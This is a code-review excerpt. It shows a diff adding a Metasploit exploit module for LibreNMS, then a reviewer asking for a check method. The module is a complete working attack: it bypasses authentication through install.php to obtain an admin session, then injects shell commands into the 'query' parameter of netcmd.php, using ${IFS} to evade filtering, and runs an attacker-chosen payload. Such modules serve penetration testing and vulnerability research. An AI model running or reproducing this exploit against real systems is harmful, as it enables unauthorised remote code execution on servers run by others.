modules/exploits/multi/http/librenms_rce.rb

```diff
@@ -0,0 +1,94 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'LibreNMS RCE',
+      'Description'    => %q{
+        This module exploit an auth-bypass in LibreNMS to get admin privileges,
+        and then executes code via a command injection.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'blotus',   # original discovery
+          'bui',      # original discovery
+          'jvoisin',  # original discovery and metasploit module
+        ],
+        'Payload'        =>
+        {
+          'Compat' => {
+            'PayloadType'  => 'cmd',
+            'RequiredCmd'  => 'generic telnet perl ruby python',
+          },
+          'DisableNops' => true,
+          'BadChars' => "\x20&#",
+        },
+      'References'     => [ 'https://github.com/librenms/librenms/commit/1205f12f10a87f50a9a9127ab3caea861bff91b9'],
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [ [ 'Automatic',{}]],
+      'Platform'       => %w{ linux unix },
+      'DisclosureDate' => 'Oct 18 2017',
+      'Privileged' => false,
+      'DefaultTarget'  => 0
+      ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
+      ])
+  end
+
+  def exploit
+    print_status("Getting admin cookie...")
+    res = send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => target_uri.path,
+    })
+    fail_with(Failure::Unknown, 'No response') if res.nil?
+    session_cookie = res.get_cookies
+
+    print_status("Got admin cookie: " + session_cookie)
+    send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => normalize_uri(target_uri.path, '/install.php'),
+      'cookie'  => session_cookie,
+      'vars_post' => {
+        'authenticated' => 1,
+        'userlevel' => 10,
+        'user_id' => 0
+      }
+    })
+
+    start_mark = Rex::Text.rand_text_alpha(rand(5) + 5)
+    end_mark  = Rex::Text.rand_text_alpha(rand(5) + 5)
+    custom_payload = "echo${IFS}#{start_mark};#{payload.encoded};echo${IFS}#{end_mark}"
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(target_uri.path, '/netcmd.php'),
+      'cookie'  => session_cookie,
+      'vars_get' => {
+        'cmd' => 'nmap',
+        'debug' => 1,
+        'query' => 'http://' + Rex::Text.rand_text_alpha(4, 8) + ';' + custom_payload
+      }
+    })
+
+    if res and res.code == 200 and res.body =~ /#{start_mark}/
+      # Prints output when using cmd/unix/generic
+      result = res.body.split(/#{start_mark}\n/)[1].split(/\n#{end_mark}/)[0]
+      if not result.strip.empty?
+        print_status("Result of the command:\n#{result}")
+      end
+    end
+  end
+
+end
```

Comment:
Is it possible to write a [`check` method](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method)?

I haven't reviewed the bug yet. Off the top of my head, here's some things you could check for:

* Is the `install.php` file left after installation? Does it exist? (return `Detected`)
* If the `install.php` file exists, can you infer if the software is vulnerable based only on a version number? (return `Detected` or `Appears`); or
* Can you check if the auth bypass is possible? Do you get an admin cookie? (return `Vulnerable`)